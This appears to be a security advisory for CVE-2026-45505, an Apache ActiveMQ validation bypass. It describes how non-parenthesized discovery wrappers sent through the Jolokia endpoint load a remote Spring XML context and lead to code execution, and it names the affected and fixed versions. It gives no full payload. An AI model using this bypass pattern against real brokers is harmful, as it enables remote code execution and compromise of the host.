CVE-2026-45505

Vulnerability

The original vulnerability (CVE-2026-34197) allowed authenticated attackers to invoke Jolokia JMX operations to load a remote Spring XML context via the VM transport's brokerConfig parameter, leading to arbitrary code execution. The fix for that CVE introduced validation to block malicious discovery URIs. However, CVE-2026-45505 identifies that non-parenthesized discovery wrappers such as masterslave:vm://...,... and static:vm://... incorrectly pass validation, allowing a bypass of the fix. This affects Apache ActiveMQ Broker, ActiveMQ All, and ActiveMQ before versions 5.19.7 and from 6.0.0 before 6.2.6 [1].

Exploitation

An authenticated attacker with access to the web console's Jolokia endpoint (/api/jolokia/) can craft a discovery URI using the non-parenthesized wrappers (e.g., masterslave:vm://...,...). This URI bypasses the validation introduced in the previous fix and still triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context via ResourceXmlApplicationContext. The attacker does not require any additional privileges beyond authentication to the web console [1].

Impact

Successful exploitation results in arbitrary code execution on the broker's JVM. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, the attacker can execute arbitrary Java code through bean factory methods such as Runtime.exec(). This compromises the confidentiality, integrity, and availability of the broker and potentially the entire network [1].

Mitigation

Users should upgrade to Apache ActiveMQ version 5.19.7 or 6.2.6, which contain the proper fix for this bypass. No workarounds are documented in the available references. The affected versions are all prior to these releases [1].